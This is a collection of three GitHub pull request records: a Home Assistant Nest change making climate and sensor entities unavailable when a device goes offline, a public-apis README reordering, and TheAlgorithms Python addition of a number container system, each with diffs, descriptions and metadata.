"sdm.devices.traits.ThermostatTemperatureSetpoint": { + "coolCelsius": 28.0, + }, + "sdm.devices.traits.Connectivity": {"status": "OFFLINE"}, + }, + ) + await setup_platform() + + assert len(hass.states.async_all()) == 1 + thermostat = hass.states.get("climate.my_thermostat") + assert thermostat is not None + assert thermostat.state == STATE_UNAVAILABLE diff --git a/tests/components/nest/test_sensor_sdm.py b/tests/components/nest/test_sensor_sdm.py index d1a89317959d69..c3698cf4123c6b 100644 --- a/tests/components/nest/test_sensor_sdm.py +++ b/tests/components/nest/test_sensor_sdm.py @@ -20,6 +20,7 @@ ATTR_FRIENDLY_NAME, ATTR_UNIT_OF_MEASUREMENT, PERCENTAGE, + STATE_UNAVAILABLE, TEMP_CELSIUS, ) from homeassistant.core import HomeAssistant @@ -90,6 +91,58 @@ async def test_thermostat_device( assert device.identifiers == {("nest", DEVICE_ID)} +async def test_thermostat_device_available( + hass: HomeAssistant, create_device: CreateDevice, setup_platform: PlatformSetup +): + """Test a thermostat with temperature and humidity sensors that is Online.""" + create_device.create( + { + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 25.1, + }, + "sdm.devices.traits.Humidity": { + "ambientHumidityPercent": 35.0, + }, + "sdm.devices.traits.Connectivity": {"status": "ONLINE"}, + } + ) + await setup_platform() + + temperature = hass.states.get("sensor.my_sensor_temperature") + assert temperature is not None + assert temperature.state == "25.1" + + humidity = hass.states.get("sensor.my_sensor_humidity") + assert humidity is not None + assert humidity.state == "35" + + +async def test_thermostat_device_unavailable( + hass: HomeAssistant, create_device: CreateDevice, setup_platform: PlatformSetup +): + """Test a thermostat with temperature and humidity sensors that is Offline.""" + create_device.create( + { + "sdm.devices.traits.Temperature": { + "ambientTemperatureCelsius": 25.1, + }, + "sdm.devices.traits.Humidity": { + "ambientHumidityPercent": 35.0, + }, + "sdm.devices.traits.Connectivity": {"status": "OFFLINE"}, + } + ) + await setup_platform() + + temperature = hass.states.get("sensor.my_sensor_temperature") + assert temperature is not None + assert temperature.state == STATE_UNAVAILABLE + + humidity = hass.states.get("sensor.my_sensor_humidity") + assert humidity is not None + assert humidity.state == STATE_UNAVAILABLE + + async def test_no_devices(hass: HomeAssistant, setup_platform: PlatformSetup): """Test no devices returned by the api.""" await setup_platform()
Update Climate and Sensor entities to be unavailable when the device connectivity trait indicates the device is offline. The prior behavior, the last known values would be displayed indefinitely if the device lost internet connectivity. This was creating the illusion that the device was still connected. With this change, the Home Assistant entities will become unavailable when the device loses connectivity. <!-- You are amazing! Thanks for contributing to our project! Please, DO NOT DELETE ANY TEXT from this template! (unless instructed). --> ## Breaking change <!-- If your PR contains a breaking change for existing users, it is important to tell them what breaks, how to make it work again and why we did this. This piece of text is published with the release notes, so it helps if you write it towards our users, not us. Note: Remove this section if this PR is NOT a breaking change. --> ## Proposed change <!-- Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue in the additional information section. --> ## Type of change <!-- What type of change does your PR introduce to Home Assistant? NOTE: Please, check only 1! box! If your PR requires multiple boxes to be checked, you'll most likely need to split it into multiple PRs. This makes things easier and faster to code review. --> - [ ] Dependency upgrade - [x] Bugfix (non-breaking change which fixes an issue) - [ ] New integration (thank you!) - [ ] New feature (which adds functionality to an existing integration) - [ ] Deprecation (breaking change to happen in the future) - [ ] Breaking change (fix/feature causing existing functionality to break) - [ ] Code quality improvements to existing code or addition of tests ## Additional information <!-- Details are important, and help maintainers processing your PR. Please be sure to fill out additional details, if applicable. --> - This PR fixes or closes issue: fixes # - This PR is related to issue: #70479 - Link to documentation pull request: ## Checklist <!-- Put an `x` in the boxes that apply. You can also fill these out after creating the PR. If you're unsure about any of them, don't hesitate to ask. We're here to help! This is simply a reminder of what we are going to look for before merging your code. --> - [x] The code change is tested and works locally. - [x] Local tests pass. **Your PR cannot be merged unless tests pass** - [x] There is no commented out code in this PR. - [x] I have followed the [development checklist][dev-checklist] - [x] The code has been formatted using Black (`black --fast homeassistant tests`) - [x] Tests have been added to verify that the new code works. If user exposed functionality or configuration variables are added/changed: - [ ] Documentation added/updated for [www.home-assistant.io][docs-repository] If the code communicates with devices, web services, or third-party tools: - [ ] The [manifest file][manifest-docs] has all fields filled out correctly. Updated and included derived files by running: `python3 -m script.hassfest`. - [ ] New or updated dependencies have been added to `requirements_all.txt`. Updated by running `python3 -m script.gen_requirements_all`. - [ ] For the updated dependencies - a link to the changelog, or at minimum a diff between library versions is added to the PR description. - [ ] Untested files have been added to `.coveragerc`. The integration reached or maintains the following [Integration Quality Scale][quality-scale]: <!-- The Integration Quality Scale scores an integration on the code quality and user experience. Each level of the quality scale consists of a list of requirements. We highly recommend getting your integration scored! --> - [ ] No score or internal - [ ] 🥈 Silver - [ ] 🥇 Gold - [ ] 🏆 Platinum <!-- This project is very active and we have a high turnover of pull requests. Unfortunately, the number of incoming pull requests is higher than what our reviewers can review and merge so there is a long backlog of pull requests waiting for review. You can help here! By reviewing another pull request, you will help raise the code quality of that pull request and the final review will be faster. This way the general pace of pull request reviews will go up and your wait time will go down. When picking a pull request to review, try to choose one that hasn't yet been reviewed. Thanks for helping out! --> To help with the load of incoming pull requests: - [ ] I have reviewed two other [open pull requests][prs] in this repository. [prs]: https://github.com/home-assistant/core/pulls?q=is%3Aopen+is%3Apr+-author%3A%40me+-draft%3Atrue+-label%3Awaiting-for-upstream+sort%3Acreated-desc+review%3Anone+-status%3Afailure <!-- Thank you for contributing <3 Below, some useful links you could explore: --> [dev-checklist]: https://developers.home-assistant.io/docs/en/development_checklist.html [manifest-docs]: https://developers.home-assistant.io/docs/en/creating_integration_manifest.html [quality-scale]: https://developers.home-assistant.io/docs/en/next/integration_quality_scale_index.html [docs-repository]: https://github.com/home-assistant/home-assistant.io
https://api.github.com/repos/home-assistant/core/pulls/78773
2022-09-19T13:47:43Z
2022-09-29T02:23:11Z
2022-09-29T02:23:11Z
2022-09-30T02:58:32Z
2,184
home-assistant/core
38,732
Switched diabetes and covid APIs
diff --git a/README.md b/README.md index caec26f02d..789393be52 100644 --- a/README.md +++ b/README.md @@ -523,8 +523,8 @@ API | Description | Auth | HTTPS | CORS | API | Description | Auth | HTTPS | CORS | |---|---|---|---|---| | [BetterDoctor](https://developer.betterdoctor.com/) | Detailed information about doctors in your area | `apiKey` | Yes | Unknown | -| [Diabetes](http://predictbgl.com/api/) | Logging and retrieving diabetes information | No | No | Unknown | | [Covid-19](https://covid19api.com/) | Covid 19 spread, infection and recovery | No | Yes | Yes | +| [Diabetes](http://predictbgl.com/api/) | Logging and retrieving diabetes information | No | No | Unknown | | [Flutrack](http://www.flutrack.org/) | Influenza-like symptoms with geotracking | No | No | Unknown | | [Healthcare.gov](https://www.healthcare.gov/developers/) | Educational content about the US Health Insurance Marketplace | No | Yes | Unknown | | [Lexigram](https://docs.lexigram.io/v1/welcome) | NLP that extracts mentions of clinical concepts from text, gives access to clinical ontology | `apiKey` | Yes | Unknown |
Thank you for taking the time to work on a Pull Request for this project! To ensure your PR is dealt with swiftly please check the following: - [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md) - [x] **Your additions are ordered alphabetically** - I used a proper alphabet this time. - [x] Your submission has a useful description - [x] The description does not end with punctuation - [x] Each table column should be padded with one space on either side - [x] You have searched the repository for any relevant issues or pull requests - [x] Any category you are creating has the minimum requirement of 3 items - [x] All changes have been [squashed][squash-link] into a single commit [squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/1192
2020-03-17T08:57:18Z
2020-03-17T09:00:04Z
2020-03-17T09:00:03Z
2020-08-03T16:50:01Z
300
public-apis/public-apis
35,629
Create number container system algorithm
diff --git a/DIRECTORY.md b/DIRECTORY.md index 231b0e2f1d2f..6dac4a9a5783 100644 --- a/DIRECTORY.md +++ b/DIRECTORY.md @@ -419,8 +419,9 @@ * [Frequent Pattern Graph Miner](graphs/frequent_pattern_graph_miner.py) * [G Topological Sort](graphs/g_topological_sort.py) * [Gale Shapley Bigraph](graphs/gale_shapley_bigraph.py) + * [Graph Adjacency List](graphs/graph_adjacency_list.py) + * [Graph Adjacency Matrix](graphs/graph_adjacency_matrix.py) * [Graph List](graphs/graph_list.py) - * [Graph Matrix](graphs/graph_matrix.py) * [Graphs Floyd Warshall](graphs/graphs_floyd_warshall.py) * [Greedy Best First](graphs/greedy_best_first.py) * [Greedy Min Vertex Cover](graphs/greedy_min_vertex_cover.py) @@ -479,6 +480,7 @@ * [Lib](linear_algebra/src/lib.py) * [Polynom For Points](linear_algebra/src/polynom_for_points.py) * [Power Iteration](linear_algebra/src/power_iteration.py) + * [Rank Of Matrix](linear_algebra/src/rank_of_matrix.py) * [Rayleigh Quotient](linear_algebra/src/rayleigh_quotient.py) * [Schur Complement](linear_algebra/src/schur_complement.py) * [Test Linear Algebra](linear_algebra/src/test_linear_algebra.py) @@ -651,6 +653,7 @@ * [Sigmoid Linear Unit](maths/sigmoid_linear_unit.py) * [Signum](maths/signum.py) * [Simpson Rule](maths/simpson_rule.py) + * [Simultaneous Linear Equation Solver](maths/simultaneous_linear_equation_solver.py) * [Sin](maths/sin.py) * [Sock Merchant](maths/sock_merchant.py) * [Softmax](maths/softmax.py) @@ -726,6 +729,7 @@ * [Maximum Subarray](other/maximum_subarray.py) * [Maximum Subsequence](other/maximum_subsequence.py) * [Nested Brackets](other/nested_brackets.py) + * [Number Container System](other/number_container_system.py) * [Password](other/password.py) * [Quine](other/quine.py) * [Scoring Algorithm](other/scoring_algorithm.py) diff --git a/other/number_container_system.py b/other/number_container_system.py new file mode 100644 index 000000000000..f547bc8a229e --- /dev/null +++ b/other/number_container_system.py @@ -0,0 +1,180 @@ +""" +A number container system that uses binary search to delete and insert values into +arrays with O(n logn) write times and O(1) read times. + +This container system holds integers at indexes. + +Further explained in this leetcode problem +> https://leetcode.com/problems/minimum-cost-tree-from-leaf-values +""" + + +class NumberContainer: + def __init__(self) -> None: + # numbermap keys are the number and its values are lists of indexes sorted + # in ascending order + self.numbermap: dict[int, list[int]] = {} + # indexmap keys are an index and it's values are the number at that index + self.indexmap: dict[int, int] = {} + + def binary_search_delete(self, array: list | str | range, item: int) -> list[int]: + """ + Removes the item from the sorted array and returns + the new array. + + >>> NumberContainer().binary_search_delete([1,2,3], 2) + [1, 3] + >>> NumberContainer().binary_search_delete([0, 0, 0], 0) + [0, 0] + >>> NumberContainer().binary_search_delete([-1, -1, -1], -1) + [-1, -1] + >>> NumberContainer().binary_search_delete([-1, 0], 0) + [-1] + >>> NumberContainer().binary_search_delete([-1, 0], -1) + [0] + >>> NumberContainer().binary_search_delete(range(7), 3) + [0, 1, 2, 4, 5, 6] + >>> NumberContainer().binary_search_delete([1.1, 2.2, 3.3], 2.2) + [1.1, 3.3] + >>> NumberContainer().binary_search_delete("abcde", "c") + ['a', 'b', 'd', 'e'] + >>> NumberContainer().binary_search_delete([0, -1, 2, 4], 0) + Traceback (most recent call last): + ... + ValueError: Either the item is not in the array or the array was unsorted + >>> NumberContainer().binary_search_delete([2, 0, 4, -1, 11], -1) + Traceback (most recent call last): + ... + ValueError: Either the item is not in the array or the array was unsorted + >>> NumberContainer().binary_search_delete(125, 1) + Traceback (most recent call last): + ... + TypeError: binary_search_delete() only accepts either a list, range or str + """ + if isinstance(array, (range, str)): + array = list(array) + elif not isinstance(array, list): + raise TypeError( + "binary_search_delete() only accepts either a list, range or str" + ) + + low = 0 + high = len(array) - 1 + + while low <= high: + mid = (low + high) // 2 + if array[mid] == item: + array.pop(mid) + return array + elif array[mid] < item: + low = mid + 1 + else: + high = mid - 1 + raise ValueError( + "Either the item is not in the array or the array was unsorted" + ) + + def binary_search_insert(self, array: list | str | range, index: int) -> list[int]: + """ + Inserts the index into the sorted array + at the correct position. + + >>> NumberContainer().binary_search_insert([1,2,3], 2) + [1, 2, 2, 3] + >>> NumberContainer().binary_search_insert([0,1,3], 2) + [0, 1, 2, 3] + >>> NumberContainer().binary_search_insert([-5, -3, 0, 0, 11, 103], 51) + [-5, -3, 0, 0, 11, 51, 103] + >>> NumberContainer().binary_search_insert([-5, -3, 0, 0, 11, 100, 103], 101) + [-5, -3, 0, 0, 11, 100, 101, 103] + >>> NumberContainer().binary_search_insert(range(10), 4) + [0, 1, 2, 3, 4, 4, 5, 6, 7, 8, 9] + >>> NumberContainer().binary_search_insert("abd", "c") + ['a', 'b', 'c', 'd'] + >>> NumberContainer().binary_search_insert(131, 23) + Traceback (most recent call last): + ... + TypeError: binary_search_insert() only accepts either a list, range or str + """ + if isinstance(array, (range, str)): + array = list(array) + elif not isinstance(array, list): + raise TypeError( + "binary_search_insert() only accepts either a list, range or str" + ) + + low = 0 + high = len(array) - 1 + + while low <= high: + mid = (low + high) // 2 + if array[mid] == index: + # If the item already exists in the array, + # insert it after the existing item + array.insert(mid + 1, index) + return array + elif array[mid] < index: + low = mid + 1 + else: + high = mid - 1 + + # If the item doesn't exist in the array, insert it at the appropriate position + array.insert(low, index) + return array + + def change(self, index: int, number: int) -> None: + """ + Changes (sets) the index as number + + >>> cont = NumberContainer() + >>> cont.change(0, 10) + >>> cont.change(0, 20) + >>> cont.change(-13, 20) + >>> cont.change(-100030, 20032903290) + """ + # Remove previous index + if index in self.indexmap: + n = self.indexmap[index] + if len(self.numbermap[n]) == 1: + del self.numbermap[n] + else: + self.numbermap[n] = self.binary_search_delete(self.numbermap[n], index) + + # Set new index + self.indexmap[index] = number + + # Number not seen before or empty so insert number value + if number not in self.numbermap: + self.numbermap[number] = [index] + + # Here we need to perform a binary search insertion in order to insert + # The item in the correct place + else: + self.numbermap[number] = self.binary_search_insert( + self.numbermap[number], index + ) + + def find(self, number: int) -> int: + """ + Returns the smallest index where the number is. + + >>> cont = NumberContainer() + >>> cont.find(10) + -1 + >>> cont.change(0, 10) + >>> cont.find(10) + 0 + >>> cont.change(0, 20) + >>> cont.find(10) + -1 + >>> cont.find(20) + 0 + """ + # Simply return the 0th index (smallest) of the indexes found (or -1) + return self.numbermap.get(number, [-1])[0] + + +if __name__ == "__main__": + import doctest + + doctest.testmod()
### Describe your change: Implements a number container system algorithm which stores indexes and numbers at these corresponding indexes. * [x] Add an algorithm? * [ ] Fix a bug or typo in an existing algorithm? * [ ] Documentation change? ### Checklist: * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [x] All new algorithms include at least one URL that points to Wikipedia or another similar explanation. * [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
https://api.github.com/repos/TheAlgorithms/Python/pulls/8808
2023-06-07T21:44:26Z
2023-06-08T12:40:39Z
2023-06-08T12:40:39Z
2023-06-08T14:06:09Z
2,422
TheAlgorithms/Python
29,929